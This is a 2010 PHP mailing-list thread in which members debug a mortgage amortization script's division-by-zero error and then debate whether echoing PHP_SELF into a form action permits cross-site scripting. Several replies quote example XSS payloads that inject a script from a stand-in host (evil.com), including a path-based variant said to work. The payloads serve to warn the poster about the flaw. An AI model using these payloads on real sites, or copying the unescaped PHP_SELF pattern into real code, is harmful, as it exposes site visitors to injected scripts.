I have a mortgage amortization script that was working fine,now it seems to
have gone awry. Below is the entire script plus input page. I am getting an
error

Warning: Division by zero in
/home/content/J/a/y/Jayski/html/one2one/Ricksrecursivefuncti ons.php on line
47

Which is (pow($intCalc,$totalPayments) - 1);

Frankly I am not even sure the information is being passed to the script.

Anyone see what I am missing?

Gary


<div id="onecol">Calculate your Loan</div>
<div id="leftcontent">

<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"></form>
<table>
<tr>
<td style="background-color:#B1D8D8" width="110px">Loan Amount</td>
<td><input name="loan_amount" type="text" size="25" /> USD</td>
<td><a href="javascript:void(0);" onmouseover="Tip('This is the
amount of money to be loaned.')" onmouseout="UnTip()"><img
src="images/help.png" class="noborder"/></a></td>
</tr>
<tr>
<td style="background-color:#B1D8D8" width="110px">Type of Loan</td>
<td>
<select name="type" size="1" id="type">
<option>Installment</option>
<option>Balloon</option>
</select></td>
<td><a href="javascript:void(0);" onmouseover="Tip('This is the method of
repayment.')" onmouseout="UnTip()"><img src="images/help.png"
class="noborder"/></a></td>
</tr>
<tr>
<td style="background-color:#B1D8D8" width="100px">Term of Loan</td>
<td><input name="loan_term" type="text" size="5" />
</select>Months</td>
<td><a href="javascript:void(0);" onmouseover="Tip('This is the amount of
time that the money is loaned for.')" onmouseout="UnTip()"><img
src="images/help.png" class="noborder" /></a></td>
</tr>
<tr>
<td style="background-color:#B1D8D8" width="140px">Interest Rate</td>
<td><input name="int_rate" type="text" size="10" /> Per
Annum</td><td><a href="javascript:void(0);" onmouseover="Tip('Percentage
(%) charged on loan on an annual basis.
Please see our FAQs for
information on usury rates.
If no amount is entered this will be
0%.')" onmouseout="UnTip()"><img src="images/help.png" class="noborder"
/></a></td>
</tr>
</table>
<label>
<input type="submit" name="submit" id="submit" value="submit" />
</label>
</form>
<?php

function amortizationTable($paymentNum, $periodicPayment, $balance,
$monthlyInterest) {
$paymentInterest = round($balance * $monthlyInterest,2);
$paymentPrincipal = round($periodicPayment - $paymentInterest,2);
$newBalance = round($balance - $paymentPrincipal,2);
print "<tr>
<td>$paymentNum</td>
<td>\$".number_format($balance,2)."</td>
<td>\$".number_format($periodicPayment,2)."</td>
<td>\$".number_format($paymentInterest,2)."</td>
<td>\$".number_format($paymentPrincipal,2)."</td>
</tr>";
# If balance not yet zero, recursively call amortizationTable()
if ($newBalance > 0) {
$paymentNum++;
amortizationTable($paymentNum, $periodicPayment, $newBalance,
$monthlyInterest);
} else {
exit;
}
} #end amortizationTable()

# Loan balance
$balance =($_POST['loan_amount']);

# Loan interest rate
$interestRate = ($_POST['int_rate']);

# Monthly interest rate
$monthlyInterest = ("$interestRate / 12");

# Term length of the loan, in years.
$termLength =($_POST['loan_term']);

# Number of payments per year.
$paymentsPerYear = 12;

# Payment iteration
$paymentNumber =($_POST['loan_term']);

# Perform preliminary calculations
$totalPayments = $termLength * $paymentsPerYear;
$intCalc = 1 + $interestRate / $paymentsPerYear;
$periodicPayment = $balance * pow($intCalc,$totalPayments) * ($intCalc -
1) /
(pow($intCalc,$totalPayments) - 1);
$periodicPayment = round($periodicPayment,2);

# Create table
echo "<table width='50%' align='center' border='1'>";
print "<tr>
<th>Payment
Number</th><th>Balance</th>
<th>Payment</th><th>Interest</th><th>Principal</th>
</tr>";

# Call recursive function
amortizationTable($paymentNumber, $periodicPayment, $balance,
$monthlyInterest);

# Close table
print "</table>";

?>
</div>



__________ Information from ESET Smart Security, version of virus signature database 4932 (20100310) __________

The message was checked by ESET Smart Security.

http://www.eset.com





--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Looks to me like you are closing your form before you put anything in
it. Therefore, the loan_amount is not set making the value 0. Follow
the math, and you are dividing by 1-1.

Change this line:

<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"></form>

to:

<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">

and you should be good to go.

Joseph

Gary wrote:
> I have a mortgage amortization script that was working fine,now it seems to
> have gone awry. Below is the entire script plus input page. I am getting an
> error
>
> Warning: Division by zero in
> /home/content/J/a/y/Jayski/html/one2one/Ricksrecursivefuncti ons.php on line
> 47
>
> Which is (pow($intCalc,$totalPayments) - 1);
>
> Frankly I am not even sure the information is being passed to the script.
>
> Anyone see what I am missing?
>
> Gary
>
>
> <div id="onecol">Calculate your Loan</div>
> <div id="leftcontent">
>
> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"></form>
> <table>
> <tr>
> <td style="background-color:#B1D8D8" width="110px">Loan Amount</td>
> <td><input name="loan_amount" type="text" size="25" /> USD</td>
> <td><a href="javascript:void(0);" onmouseover="Tip('This is the
> amount of money to be loaned.')" onmouseout="UnTip()"><img
> src="images/help.png" class="noborder"/></a></td>
> </tr>
> <tr>
> <td style="background-color:#B1D8D8" width="110px">Type of Loan</td>
> <td>
> <select name="type" size="1" id="type">
> <option>Installment</option>
> <option>Balloon</option>
> </select></td>
> <td><a href="javascript:void(0);" onmouseover="Tip('This is the method of
> repayment.')" onmouseout="UnTip()"><img src="images/help.png"
> class="noborder"/></a></td>
> </tr>
> <tr>
> <td style="background-color:#B1D8D8" width="100px">Term of Loan</td>
> <td><input name="loan_term" type="text" size="5" />
> </select>Months</td>
> <td><a href="javascript:void(0);" onmouseover="Tip('This is the amount of
> time that the money is loaned for.')" onmouseout="UnTip()"><img
> src="images/help.png" class="noborder" /></a></td>
> </tr>
> <tr>
> <td style="background-color:#B1D8D8" width="140px">Interest Rate</td>
> <td><input name="int_rate" type="text" size="10" /> Per
> Annum</td><td><a href="javascript:void(0);" onmouseover="Tip('Percentage
> (%) charged on loan on an annual basis.
Please see our FAQs for
> information on usury rates.
If no amount is entered this will be
> 0%.')" onmouseout="UnTip()"><img src="images/help.png" class="noborder"
> /></a></td>
> </tr>
> </table>
> <label>
> <input type="submit" name="submit" id="submit" value="submit" />
> </label>
> </form>
> <?php
>
> function amortizationTable($paymentNum, $periodicPayment, $balance,
> $monthlyInterest) {
> $paymentInterest = round($balance * $monthlyInterest,2);
> $paymentPrincipal = round($periodicPayment - $paymentInterest,2);
> $newBalance = round($balance - $paymentPrincipal,2);
> print "<tr>
> <td>$paymentNum</td>
> <td>\$".number_format($balance,2)."</td>
> <td>\$".number_format($periodicPayment,2)."</td>
> <td>\$".number_format($paymentInterest,2)."</td>
> <td>\$".number_format($paymentPrincipal,2)."</td>
> </tr>";
> # If balance not yet zero, recursively call amortizationTable()
> if ($newBalance > 0) {
> $paymentNum++;
> amortizationTable($paymentNum, $periodicPayment, $newBalance,
> $monthlyInterest);
> } else {
> exit;
> }
> } #end amortizationTable()
>
> # Loan balance
> $balance =($_POST['loan_amount']);
>
> # Loan interest rate
> $interestRate = ($_POST['int_rate']);
>
> # Monthly interest rate
> $monthlyInterest = ("$interestRate / 12");
>
> # Term length of the loan, in years.
> $termLength =($_POST['loan_term']);
>
> # Number of payments per year.
> $paymentsPerYear = 12;
>
> # Payment iteration
> $paymentNumber =($_POST['loan_term']);
>
> # Perform preliminary calculations
> $totalPayments = $termLength * $paymentsPerYear;
> $intCalc = 1 + $interestRate / $paymentsPerYear;
> $periodicPayment = $balance * pow($intCalc,$totalPayments) * ($intCalc -
> 1) /
> (pow($intCalc,$totalPayments) - 1);
> $periodicPayment = round($periodicPayment,2);
>
> # Create table
> echo "<table width='50%' align='center' border='1'>";
> print "<tr>
> <th>Payment
> Number</th><th>Balance</th>
> <th>Payment</th><th>Interest</th><th>Principal</th>
> </tr>";
>
> # Call recursive function
> amortizationTable($paymentNumber, $periodicPayment, $balance,
> $monthlyInterest);
>
> # Close table
> print "</table>";
>
> ?>
> </div>
>
>
>
> __________ Information from ESET Smart Security, version of virus signature database 4932 (20100310) __________
>
> The message was checked by ESET Smart Security.
>
> http://www.eset.com
>
>
>
>
>
>

--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Op 3/10/10 6:23 PM, Joseph Thayne schreef:
> Looks to me like you are closing your form before you put anything in
> it. Therefore, the loan_amount is not set making the value 0. Follow
> the math, and you are dividing by 1-1.
>
> Change this line:
>
> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"></form>
>
> to:
>
> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">

this is a XSS waiting to happen. I can put something like the following in
the request uri:

index.php?" onsubmit="evil()"><script src="http://www.evil.com/evi.js"></script>

with regard to the original problem - some input validation is in order.

(pow($intCalc,$totalPayments) - 1);

if $intCal and $totalPayments are both equal to 1 then either something
is wrong and the calc shouldn't be done or some other calc needs to
be done.

every value being POSTed should be checked that it's been set, and that
it's a valid numeric value (for the numeric fields) ... if anything is
missing show the form again and display an error message without doing
the calculation.

>
> and you should be good to go.
>
> Joseph
>
> Gary wrote:
>> I have a mortgage amortization script that was working fine,now it
>> seems to have gone awry. Below is the entire script plus input page.
>> I am getting an error
>>
>> Warning: Division by zero in
>> /home/content/J/a/y/Jayski/html/one2one/Ricksrecursivefuncti ons.php on
>> line 47
>>
>> Which is (pow($intCalc,$totalPayments) - 1);
>>
>> Frankly I am not even sure the information is being passed to the script.
>>
>> Anyone see what I am missing?
>>
>> Gary
>>
>>
>> <div id="onecol">Calculate your Loan</div>
>> <div id="leftcontent">
>>
>> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"></form>
>> <table>
>> <tr>
>> <td style="background-color:#B1D8D8" width="110px">Loan Amount</td>
>> <td><input name="loan_amount" type="text" size="25" /> USD</td>
>> <td><a href="javascript:void(0);" onmouseover="Tip('This is
>> the amount of money to be loaned.')" onmouseout="UnTip()"><img
>> src="images/help.png" class="noborder"/></a></td>
>> </tr>
>> <tr>
>> <td style="background-color:#B1D8D8" width="110px">Type of
>> Loan</td>
>> <td>
>> <select name="type" size="1" id="type">
>> <option>Installment</option>
>> <option>Balloon</option>
>> </select></td>
>> <td><a href="javascript:void(0);" onmouseover="Tip('This is the
>> method of repayment.')" onmouseout="UnTip()"><img
>> src="images/help.png" class="noborder"/></a></td>
>> </tr>
>> <tr>
>> <td style="background-color:#B1D8D8" width="100px">Term of Loan</td>
>> <td><input name="loan_term" type="text" size="5" />
>> </select>Months</td>
>> <td><a href="javascript:void(0);" onmouseover="Tip('This is the
>> amount of time that the money is loaned for.')"
>> onmouseout="UnTip()"><img src="images/help.png" class="noborder"
>> /></a></td>
>> </tr>
>> <tr>
>> <td style="background-color:#B1D8D8" width="140px">Interest
>> Rate</td>
>> <td><input name="int_rate" type="text" size="10" /> Per
>> Annum</td><td><a href="javascript:void(0);"
>> onmouseover="Tip('Percentage (%) charged on loan on an annual basis.
>>
Please see our FAQs for information on usury rates.
If no
>> amount is entered this will be 0%.')" onmouseout="UnTip()"><img
>> src="images/help.png" class="noborder" /></a></td>
>> </tr>
>> </table>
>> <label>
>> <input type="submit" name="submit" id="submit" value="submit" />
>> </label>
>> </form>
>> <?php
>>
>> function amortizationTable($paymentNum, $periodicPayment, $balance,
>> $monthlyInterest) {
>> $paymentInterest = round($balance * $monthlyInterest,2);
>> $paymentPrincipal = round($periodicPayment - $paymentInterest,2);
>> $newBalance = round($balance - $paymentPrincipal,2);
>> print "<tr>
>> <td>$paymentNum</td>
>> <td>\$".number_format($balance,2)."</td>
>> <td>\$".number_format($periodicPayment,2)."</td>
>> <td>\$".number_format($paymentInterest,2)."</td>
>> <td>\$".number_format($paymentPrincipal,2)."</td>
>> </tr>";
>> # If balance not yet zero, recursively call amortizationTable()
>> if ($newBalance > 0) {
>> $paymentNum++;
>> amortizationTable($paymentNum, $periodicPayment, $newBalance,
>> $monthlyInterest);
>> } else {
>> exit;
>> }
>> } #end amortizationTable()
>>
>> # Loan balance
>> $balance =($_POST['loan_amount']);
>>
>> # Loan interest rate
>> $interestRate = ($_POST['int_rate']);
>>
>> # Monthly interest rate
>> $monthlyInterest = ("$interestRate / 12");
>>
>> # Term length of the loan, in years.
>> $termLength =($_POST['loan_term']);
>>
>> # Number of payments per year.
>> $paymentsPerYear = 12;
>>
>> # Payment iteration
>> $paymentNumber =($_POST['loan_term']);
>>
>> # Perform preliminary calculations
>> $totalPayments = $termLength * $paymentsPerYear;
>> $intCalc = 1 + $interestRate / $paymentsPerYear;
>> $periodicPayment = $balance * pow($intCalc,$totalPayments) *
>> ($intCalc - 1) /
>> (pow($intCalc,$totalPayments) - 1);
>> $periodicPayment = round($periodicPayment,2);
>>
>> # Create table
>> echo "<table width='50%' align='center' border='1'>";
>> print "<tr>
>> <th>Payment
>> Number</th><th>Balance</th>
>> <th>Payment</th><th>Interest</th><th>Principal</th>
>> </tr>";
>>
>> # Call recursive function
>> amortizationTable($paymentNumber, $periodicPayment, $balance,
>> $monthlyInterest);
>>
>> # Close table
>> print "</table>";
>>
>> ?>
>> </div>
>>
>>
>> __________ Information from ESET Smart Security, version of virus
>> signature database 4932 (20100310) __________
>>
>> The message was checked by ESET Smart Security.
>>
>> http://www.eset.com
>>
>>
>>
>>
>>
>>
>


--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Joseph

My apologise for not writing sooner to thank you, you were of course
correct. Thanks again.

Gary
"Joseph Thayne" <webadmin [at] thaynefam.org> wrote in message
news:4B97E3A2.2030302 [at] thaynefam.org...
> Looks to me like you are closing your form before you put anything in it.
> Therefore, the loan_amount is not set making the value 0. Follow the
> math, and you are dividing by 1-1.
>
> Change this line:
>
> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"></form>
>
> to:
>
> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
>
> and you should be good to go.
>
> Joseph
>
> Gary wrote:
>> I have a mortgage amortization script that was working fine,now it seems
>> to have gone awry. Below is the entire script plus input page. I am
>> getting an error
>>
>> Warning: Division by zero in
>> /home/content/J/a/y/Jayski/html/one2one/Ricksrecursivefuncti ons.php on
>> line 47
>>
>> Which is (pow($intCalc,$totalPayments) - 1);
>>
>> Frankly I am not even sure the information is being passed to the script.
>>
>> Anyone see what I am missing?
>>
>> Gary
>>
>>
>> <div id="onecol">Calculate your Loan</div>
>> <div id="leftcontent">
>>
>> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"></form>
>> <table>
>> <tr>
>> <td style="background-color:#B1D8D8" width="110px">Loan Amount</td>
>> <td><input name="loan_amount" type="text" size="25" /> USD</td>
>> <td><a href="javascript:void(0);" onmouseover="Tip('This is the
>> amount of money to be loaned.')" onmouseout="UnTip()"><img
>> src="images/help.png" class="noborder"/></a></td>
>> </tr>
>> <tr>
>> <td style="background-color:#B1D8D8" width="110px">Type of
>> Loan</td>
>> <td>
>> <select name="type" size="1" id="type">
>> <option>Installment</option>
>> <option>Balloon</option>
>> </select></td>
>> <td><a href="javascript:void(0);" onmouseover="Tip('This is the method
>> of repayment.')" onmouseout="UnTip()"><img src="images/help.png"
>> class="noborder"/></a></td>
>> </tr>
>> <tr>
>> <td style="background-color:#B1D8D8" width="100px">Term of Loan</td>
>> <td><input name="loan_term" type="text" size="5" />
>> </select>Months</td>
>> <td><a href="javascript:void(0);" onmouseover="Tip('This is the amount
>> of time that the money is loaned for.')" onmouseout="UnTip()"><img
>> src="images/help.png" class="noborder" /></a></td>
>> </tr>
>> <tr>
>> <td style="background-color:#B1D8D8" width="140px">Interest
>> Rate</td>
>> <td><input name="int_rate" type="text" size="10" /> Per
>> Annum</td><td><a href="javascript:void(0);" onmouseover="Tip('Percentage
>> (%) charged on loan on an annual basis.
Please see our FAQs for
>> information on usury rates.
If no amount is entered this will be
>> 0%.')" onmouseout="UnTip()"><img src="images/help.png" class="noborder"
>> /></a></td>
>> </tr>
>> </table>
>> <label>
>> <input type="submit" name="submit" id="submit" value="submit" />
>> </label>
>> </form>
>> <?php
>>
>> function amortizationTable($paymentNum, $periodicPayment, $balance,
>> $monthlyInterest) {
>> $paymentInterest = round($balance * $monthlyInterest,2);
>> $paymentPrincipal = round($periodicPayment - $paymentInterest,2);
>> $newBalance = round($balance - $paymentPrincipal,2);
>> print "<tr>
>> <td>$paymentNum</td>
>> <td>\$".number_format($balance,2)."</td>
>> <td>\$".number_format($periodicPayment,2)."</td>
>> <td>\$".number_format($paymentInterest,2)."</td>
>> <td>\$".number_format($paymentPrincipal,2)."</td>
>> </tr>";
>> # If balance not yet zero, recursively call amortizationTable()
>> if ($newBalance > 0) {
>> $paymentNum++;
>> amortizationTable($paymentNum, $periodicPayment, $newBalance,
>> $monthlyInterest);
>> } else {
>> exit;
>> }
>> } #end amortizationTable()
>>
>> # Loan balance
>> $balance =($_POST['loan_amount']);
>>
>> # Loan interest rate
>> $interestRate = ($_POST['int_rate']);
>>
>> # Monthly interest rate
>> $monthlyInterest = ("$interestRate / 12");
>>
>> # Term length of the loan, in years.
>> $termLength =($_POST['loan_term']);
>>
>> # Number of payments per year.
>> $paymentsPerYear = 12;
>>
>> # Payment iteration
>> $paymentNumber =($_POST['loan_term']);
>>
>> # Perform preliminary calculations
>> $totalPayments = $termLength * $paymentsPerYear;
>> $intCalc = 1 + $interestRate / $paymentsPerYear;
>> $periodicPayment = $balance * pow($intCalc,$totalPayments) *
>> ($intCalc - 1) /
>> (pow($intCalc,$totalPayments) - 1);
>> $periodicPayment = round($periodicPayment,2);
>>
>> # Create table
>> echo "<table width='50%' align='center' border='1'>";
>> print "<tr>
>> <th>Payment
>> Number</th><th>Balance</th>
>> <th>Payment</th><th>Interest</th><th>Principal</th>
>> </tr>";
>>
>> # Call recursive function
>> amortizationTable($paymentNumber, $periodicPayment, $balance,
>> $monthlyInterest);
>>
>> # Close table
>> print "</table>";
>>
>> ?>
>> </div>
>>
>>
>> __________ Information from ESET Smart Security, version of virus
>> signature database 4932 (20100310) __________
>>
>> The message was checked by ESET Smart Security.
>>
>> http://www.eset.com
>>
>>
>>
>>
>>
>>
>
> __________ Information from ESET Smart Security, version of virus
> signature database 4932 (20100310) __________
>
> The message was checked by ESET Smart Security.
>
> http://www.eset.com
>
>
>



__________ Information from ESET Smart Security, version of virus signature database 4933 (20100310) __________

The message was checked by ESET Smart Security.

http://www.eset.com





--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

On Wed, Mar 10, 2010 at 22:27, Jochem Maas <jochem [at] iamjochem.com> wrote:
> Op 3/10/10 6:23 PM, Joseph Thayne schreef:
>> Looks to me like you are closing your form before you put anything in
>> it. =C2=A0Therefore, the loan_amount is not set making the value 0. =C2=
=A0Follow
>> the math, and you are dividing by 1-1.
>>
>> Change this line:
>>
>> <form action=3D"<?php echo $_SERVER['PHP_SELF']; ?>" method=3D"post"></f=
orm>
>>
>> to:
>>
>> <form action=3D"<?php echo $_SERVER['PHP_SELF']; ?>" method=3D"post">
>
> this is a XSS waiting to happen. I can put something like the following i=
n
> the request uri:
>
> index.php?" onsubmit=3D"evil()"><script src=3D"http://www.evil.com/evi.js=
"></script>
>
> with regard to the original problem - some input validation is in order.

PHP_SELF doesn't contain the query string, so your particular attack
wouldn't work. It's still a security issue though.

--
Daniel Egeberg

--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Hi Jochem,

Jochem Maas wrote:
> Op 3/10/10 6:23 PM, Joseph Thayne schreef:
>> Looks to me like you are closing your form before you put anything in
>> it. Therefore, the loan_amount is not set making the value 0. Follow
>> the math, and you are dividing by 1-1.
>>
>> Change this line:
>>
>> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"></form>
>>
>> to:
>>
>> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
>
> this is a XSS waiting to happen. I can put something like the following in
> the request uri:
>
> index.php?" onsubmit="evil()"><script src="http://www.evil.com/evi.js"></script>
>
Apparently it's not going to work. PHP_SELF does not include query
string. So it is safe to use it this way.

Regards,
Dmitry


--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

On Wed, Mar 10, 2010 at 23:44, Dmitry Ruban <dmitry [at] ruban.biz> wrote:
> Hi Jochem,
>
> Jochem Maas wrote:
>>
>> Op 3/10/10 6:23 PM, Joseph Thayne schreef:
>>>
>>> Looks to me like you are closing your form before you put anything in
>>> it. =C2=A0Therefore, the loan_amount is not set making the value 0. =C2=
=A0Follow
>>> the math, and you are dividing by 1-1.
>>>
>>> Change this line:
>>>
>>> <form action=3D"<?php echo $_SERVER['PHP_SELF']; ?>" method=3D"post"></=
form>
>>>
>>> to:
>>>
>>> <form action=3D"<?php echo $_SERVER['PHP_SELF']; ?>" method=3D"post">
>>
>> this is a XSS waiting to happen. I can put something like the following =
in
>> the request uri:
>>
>> index.php?" onsubmit=3D"evil()"><script
>> src=3D"http://www.evil.com/evi.js"></script>
>>
> Apparently it's not going to work. PHP_SELF does not include query string=
..
> So it is safe to use it this way.
>
> Regards,
> Dmitry

No, it is not safe...

This won't work:
index.php?" onsubmit=3D"evil()"><script
src=3D"http://www.evil.com/evi.js"></script>

But this will:
index.php/" onsubmit=3D"evil()"><script
src=3D"http://www.evil.com/evi.js"></script>

--
Daniel Egeberg

--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Op 3/10/10 11:39 PM, Daniel Egeberg schreef:
> On Wed, Mar 10, 2010 at 23:44, Dmitry Ruban <dmitry [at] ruban.biz> wrote:
>> Hi Jochem,
>>
>> Jochem Maas wrote:
>>>
>>> Op 3/10/10 6:23 PM, Joseph Thayne schreef:
>>>>
>>>> Looks to me like you are closing your form before you put anything in
>>>> it. Therefore, the loan_amount is not set making the value 0. Follow
>>>> the math, and you are dividing by 1-1.
>>>>
>>>> Change this line:
>>>>
>>>> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"></form>
>>>>
>>>> to:
>>>>
>>>> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
>>>
>>> this is a XSS waiting to happen. I can put something like the following in
>>> the request uri:
>>>
>>> index.php?" onsubmit="evil()"><script
>>> src="http://www.evil.com/evi.js"></script>
>>>
>> Apparently it's not going to work. PHP_SELF does not include query string.
>> So it is safe to use it this way.
>>
>> Regards,
>> Dmitry
>
> No, it is not safe...
>
> This won't work:
> index.php?" onsubmit="evil()"><script
> src="http://www.evil.com/evi.js"></script>
>
> But this will:
> index.php/" onsubmit="evil()"><script
> src="http://www.evil.com/evi.js"></script>

yeah sorry, I was lax and made the query string mistake,
the issue stands though as Daniel pointed out.



>


--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

I love this place, thank you to everyone that posted, I will make changes to
make it safer.

Thanks again to everyone.

gary


"Jochem Maas" <jochem [at] iamjochem.com> wrote in message
news:4B98DE7E.8020506 [at] iamjochem.com...
> Op 3/10/10 11:39 PM, Daniel Egeberg schreef:
>> On Wed, Mar 10, 2010 at 23:44, Dmitry Ruban <dmitry [at] ruban.biz> wrote:
>>> Hi Jochem,
>>>
>>> Jochem Maas wrote:
>>>>
>>>> Op 3/10/10 6:23 PM, Joseph Thayne schreef:
>>>>>
>>>>> Looks to me like you are closing your form before you put anything in
>>>>> it. Therefore, the loan_amount is not set making the value 0. Follow
>>>>> the math, and you are dividing by 1-1.
>>>>>
>>>>> Change this line:
>>>>>
>>>>> <form action="<?php echo $_SERVER['PHP_SELF']; ?>"
>>>>> method="post"></form>
>>>>>
>>>>> to:
>>>>>
>>>>> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
>>>>
>>>> this is a XSS waiting to happen. I can put something like the following
>>>> in
>>>> the request uri:
>>>>
>>>> index.php?" onsubmit="evil()"><script
>>>> src="http://www.evil.com/evi.js"></script>
>>>>
>>> Apparently it's not going to work. PHP_SELF does not include query
>>> string.
>>> So it is safe to use it this way.
>>>
>>> Regards,
>>> Dmitry
>>
>> No, it is not safe...
>>
>> This won't work:
>> index.php?" onsubmit="evil()"><script
>> src="http://www.evil.com/evi.js"></script>
>>
>> But this will:
>> index.php/" onsubmit="evil()"><script
>> src="http://www.evil.com/evi.js"></script>
>
> yeah sorry, I was lax and made the query string mistake,
> the issue stands though as Daniel pointed out.
>
>
>
>>
>
>
> __________ Information from ESET Smart Security, version of virus
> signature database 4933 (20100310) __________
>
> The message was checked by ESET Smart Security.
>
> http://www.eset.com
>
>
>



__________ Information from ESET Smart Security, version of virus signature database 4933 (20100310) __________

The message was checked by ESET Smart Security.

http://www.eset.com





--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

I have tried and tried, countless times to be removed from this list...
still when I go to my deleted items I can see that emails leak through.
If there is an administrator who can simply delete me ( simply because I
can not seem to do this correctly) I would greatly appreciate it. Thank
You!





Sincerely,

Michael Roberts
Executive Recruiter
Corporate Staffing Services
150 Monument Road, Suite 510
Bala Cynwyd, PA 19004
P 610-771-1084
F 610-771-0390
E mroberts [at] jobscss.com
Check out my recent feature article in Professional Surveyor 12/09
edition.
http://www.profsurv.com/magazine/article.aspx?i=3D70379






-----Original Message-----
From: Gary [mailto:gwpaul [at] ptd.net]
Sent: Thursday, March 11, 2010 7:51 AM
To: php-general [at] lists.php.net
Subject: Re: [PHP] Division by 0

I love this place, thank you to everyone that posted, I will make
changes to
make it safer.

Thanks again to everyone.

gary


"Jochem Maas" <jochem [at] iamjochem.com> wrote in message
news:4B98DE7E.8020506 [at] iamjochem.com...
> Op 3/10/10 11:39 PM, Daniel Egeberg schreef:
>> On Wed, Mar 10, 2010 at 23:44, Dmitry Ruban <dmitry [at] ruban.biz> wrote:
>>> Hi Jochem,
>>>
>>> Jochem Maas wrote:
>>>>
>>>> Op 3/10/10 6:23 PM, Joseph Thayne schreef:
>>>>>
>>>>> Looks to me like you are closing your form before you put anything
in
>>>>> it. Therefore, the loan_amount is not set making the value 0.
Follow
>>>>> the math, and you are dividing by 1-1.
>>>>>
>>>>> Change this line:
>>>>>
>>>>> <form action=3D"<?php echo $_SERVER['PHP_SELF']; ?>"
>>>>> method=3D"post"></form>
>>>>>
>>>>> to:
>>>>>
>>>>> <form action=3D"<?php echo $_SERVER['PHP_SELF']; ?>" =
method=3D"post">
>>>>
>>>> this is a XSS waiting to happen. I can put something like the
following
>>>> in
>>>> the request uri:
>>>>
>>>> index.php?" onsubmit=3D"evil()"><script
>>>> src=3D"http://www.evil.com/evi.js"></script>
>>>>
>>> Apparently it's not going to work. PHP_SELF does not include query
>>> string.
>>> So it is safe to use it this way.
>>>
>>> Regards,
>>> Dmitry
>>
>> No, it is not safe...
>>
>> This won't work:
>> index.php?" onsubmit=3D"evil()"><script
>> src=3D"http://www.evil.com/evi.js"></script>
>>
>> But this will:
>> index.php/" onsubmit=3D"evil()"><script
>> src=3D"http://www.evil.com/evi.js"></script>
>
> yeah sorry, I was lax and made the query string mistake,
> the issue stands though as Daniel pointed out.
>
>
>
>>
>
>
> __________ Information from ESET Smart Security, version of virus
> signature database 4933 (20100310) __________
>
> The message was checked by ESET Smart Security.
>
> http://www.eset.com
>
>
>



__________ Information from ESET Smart Security, version of virus
signature database 4933 (20100310) __________

The message was checked by ESET Smart Security.

http://www.eset.com





--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php


--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Op 3/11/10 2:44 PM, Mike Roberts schreef:
> I have tried and tried, countless times to be removed from this list...
> still when I go to my deleted items I can see that emails leak through.
> If there is an administrator who can simply delete me ( simply because I
> can not seem to do this correctly) I would greatly appreciate it. Thank
> You!
>
>
>
>

no there is not (really!), either search the archives, search php.net
look at the bottom of any of the email sent via the list or check the
email headers of email sent via the list - any one of those will give
you a way out.

but that probably is a bit of a technical challenge, so try this:

send a blank email to php-general-unsubscribe [at] lists.php.net using the email
account you are subscribed to the list to. all things being equal you should
recieve a message saying either that you've been removed or that you need to
confirm the removal (which means either replying once more to that message
or clicking a link).

PS - it's generally considered bad form to reply to someone else's thread rather
than send a new message when you're not engaging the current conversation.

--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php